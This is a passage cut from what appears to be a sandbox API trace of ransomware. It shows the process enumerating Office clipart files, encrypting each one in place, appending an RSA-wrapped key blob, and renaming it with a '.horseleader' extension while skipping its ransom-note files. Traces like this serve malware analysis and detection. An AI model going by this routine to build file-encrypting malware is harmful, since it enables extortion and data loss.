lpNumberOfBytesRead=0x32aedf4*=0x1cd8, lpOverlapped=0x0) returned 1 [0253.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe328, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.053] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1cd8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1cd8, lpOverlapped=0x0) returned 1 [0253.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.054] CloseHandle (hObject=0x158) returned 1 [0253.054] GetProcessHeap () returned 0x780000 [0253.054] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.054] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.horseleader") returned 78 [0253.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.horseleader")) returned 1 [0253.055] GetProcessHeap () returned 0x780000 [0253.055] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.055] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1306, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00116_.WMF", cAlternateFileName="")) returned 1 [0253.055] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="Windows") returned -1 [0253.056] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0253.056] StrStrIW (lpFirst="BD00116_.WMF", lpSrch=".horseleader") returned 0x0 [0253.056] lstrcmpW (lpString1="BD00116_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.056] lstrcmpW (lpString1="BD00116_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.056] lstrlenW (lpString=".testttjffg") returned 11 [0253.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.056] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.056] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0253.059] StrStrW (lpFirst="BD00116_.WMF", lpSrch=".txt") returned 0x0 [0253.059] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4870) returned 1 [0253.059] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1306, lpOverlapped=0x0) returned 1 [0253.064] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffecfa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.064] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1306, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1306, lpOverlapped=0x0) returned 1 [0253.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.065] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.065] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.065] CloseHandle (hObject=0x158) returned 1 [0253.114] GetProcessHeap () returned 0x780000 [0253.114] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.114] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.horseleader") returned 79 [0253.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.horseleader")) returned 1 [0253.117] GetProcessHeap () returned 0x780000 [0253.117] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.117] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2332bb00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2332bb00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6906, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00141_.WMF", cAlternateFileName="")) returned 1 [0253.117] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="Windows") returned -1 [0253.117] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0253.117] StrStrIW (lpFirst="BD00141_.WMF", lpSrch=".horseleader") returned 0x0 [0253.117] lstrcmpW (lpString1="BD00141_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.117] lstrcmpW (lpString1="BD00141_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.117] lstrlenW (lpString=".testttjffg") returned 11 [0253.117] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.117] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.117] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0253.118] StrStrW (lpFirst="BD00141_.WMF", lpSrch=".txt") returned 0x0 [0253.118] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26886) returned 1 [0253.119] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.121] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.122] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.122] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1906, lpOverlapped=0x0) returned 1 [0253.122] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1906, lpOverlapped=0x0) returned 1 [0253.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.123] CloseHandle (hObject=0x158) returned 1 [0253.124] GetProcessHeap () returned 0x780000 [0253.124] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.124] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.horseleader") returned 79 [0253.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.horseleader")) returned 1 [0253.125] GetProcessHeap () returned 0x780000 [0253.125] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.125] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb983d700, ftCreationTime.dwHighDateTime=0x1bf148e, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb983d700, ftLastWriteTime.dwHighDateTime=0x1bf148e, nFileSizeHigh=0x0, nFileSizeLow=0x7114, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00146_.WMF", cAlternateFileName="")) returned 1 [0253.125] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="Windows") returned -1 [0253.125] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0253.126] StrStrIW (lpFirst="BD00146_.WMF", lpSrch=".horseleader") returned 0x0 [0253.126] lstrcmpW (lpString1="BD00146_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.126] lstrcmpW (lpString1="BD00146_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.126] lstrlenW (lpString=".testttjffg") returned 11 [0253.126] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.126] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.126] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0253.127] StrStrW (lpFirst="BD00146_.WMF", lpSrch=".txt") returned 0x0 [0253.127] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=28948) returned 1 [0253.127] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.130] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.131] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.131] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2114, lpOverlapped=0x0) returned 1 [0253.131] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2114, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2114, lpOverlapped=0x0) returned 1 [0253.132] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.133] CloseHandle (hObject=0x158) returned 1 [0253.133] GetProcessHeap () returned 0x780000 [0253.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.133] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.horseleader") returned 79 [0253.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.horseleader")) returned 1 [0253.134] GetProcessHeap () returned 0x780000 [0253.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1cf00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d1cf00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00155_.WMF", cAlternateFileName="")) returned 1 [0253.135] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="Windows") returned -1 [0253.135] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 67 [0253.136] StrStrIW (lpFirst="BD00155_.WMF", lpSrch=".horseleader") returned 0x0 [0253.136] lstrcmpW (lpString1="BD00155_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.136] lstrcmpW (lpString1="BD00155_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.136] lstrlenW (lpString=".testttjffg") returned 11 [0253.136] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.136] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.136] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 67 [0253.137] StrStrW (lpFirst="BD00155_.WMF", lpSrch=".txt") returned 0x0 [0253.137] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11636) returned 1 [0253.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2d74, lpOverlapped=0x0) returned 1 [0253.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd28c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2d74, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2d74, lpOverlapped=0x0) returned 1 [0253.141] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.141] CloseHandle (hObject=0x158) returned 1 [0253.142] GetProcessHeap () returned 0x780000 [0253.142] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.142] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.horseleader") returned 79 [0253.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.horseleader")) returned 1 [0253.143] GetProcessHeap () returned 0x780000 [0253.143] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.143] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaac100, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaaac100, ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x57f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00160_.WMF", cAlternateFileName="")) returned 1 [0253.143] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="Windows") returned -1 [0253.143] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0253.143] StrStrIW (lpFirst="BD00160_.WMF", lpSrch=".horseleader") returned 0x0 [0253.143] lstrcmpW (lpString1="BD00160_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.144] lstrcmpW (lpString1="BD00160_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.144] lstrlenW (lpString=".testttjffg") returned 11 [0253.144] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.144] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.144] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.146] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0253.146] StrStrW (lpFirst="BD00160_.WMF", lpSrch=".txt") returned 0x0 [0253.146] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=22516) returned 1 [0253.146] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.149] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.150] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7f4, lpOverlapped=0x0) returned 1 [0253.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff80c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.150] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7f4, lpOverlapped=0x0) returned 1 [0253.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 